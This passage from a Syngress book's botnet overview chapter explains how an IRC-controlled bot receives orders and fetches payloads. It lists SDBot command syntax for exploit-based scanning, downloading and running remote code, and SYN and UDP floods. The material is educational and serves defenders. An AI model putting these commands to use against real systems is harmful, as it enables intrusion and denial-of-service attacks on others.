427 Botnet fm qxd

iplist.exe >> info.txt
FHS.exe >> info.txt
The botnet also took the opportunity to start its rootkit detector and hide
and launch the password collection programs.
Waiting for Orders 
and Retrieving the Payload
Once secured, the botnet client will listen to the C&C communications
channel. In this overview, we are describing botnets that are controlled using
IRC channels. In the following chapter we will describe alternative C&C
technologies.
Each botnet family has a set of commands that it supports. For example
the SDBot supports the commands in Table 2.1, among others (adapted from
the Know Your Enemy series, “Tracking Botnets—Botnet Commands” by the
Honeynet Project).
Table 2.1 
Botnet Command Examples
Function Command 
Code 
Recruiting
(scanall|sa)
(scanstats|stats)
scandel [port|method] —[method] can be one
of a list of exploits including lsass, mydoom,
DameWare, etc.
scanstop
(advscan|asc) [port|method] [threads] [delay]
[minutes]
Downloading and updating (update|up) [url] [botid]
(download|dl) [url] [[runfile?]] [[crccheck]]
[[length]]
Execute programs locally
(execute|e) [path]
(findfile|ff) filename
(rename|mv) [from] [to] 
www.syngress.com
Botnets Overview • Chapter 2
41
Continued
427_Botnet_02.qxd 1/9/07 9:49 AM Page 41

Table 2.1 continued 
Botnet Command Examples
Function Command 
Code 
findfilestopp 
DDoS
syn [ip] [port] [seconds|amount] [sip] [sport]
[rand]
udp [host] [num] [size] [delay] [[port]]size)
ping [host] [num] [size] [delay]num
There are more details about IRC C&C in Chapter 8.
The botnet client will then request the associated payload.The payload is
the term I give the software representing the intended function of this botnet
client. Note from the diagram in Figure 2.1 that the function can change at
any time.This is the beauty of a modular design. Updates can be sent prior to
the execution of any assigned task.The primary function of the botnet client
can be changed simply by downloading new payload software, designating the
target(s), scheduling the execution, and the desired duration of the action.The
next few paragraphs will describe some of these potential payloads.

Download 6,98 Mb.

Do'stlaringiz bilan baham: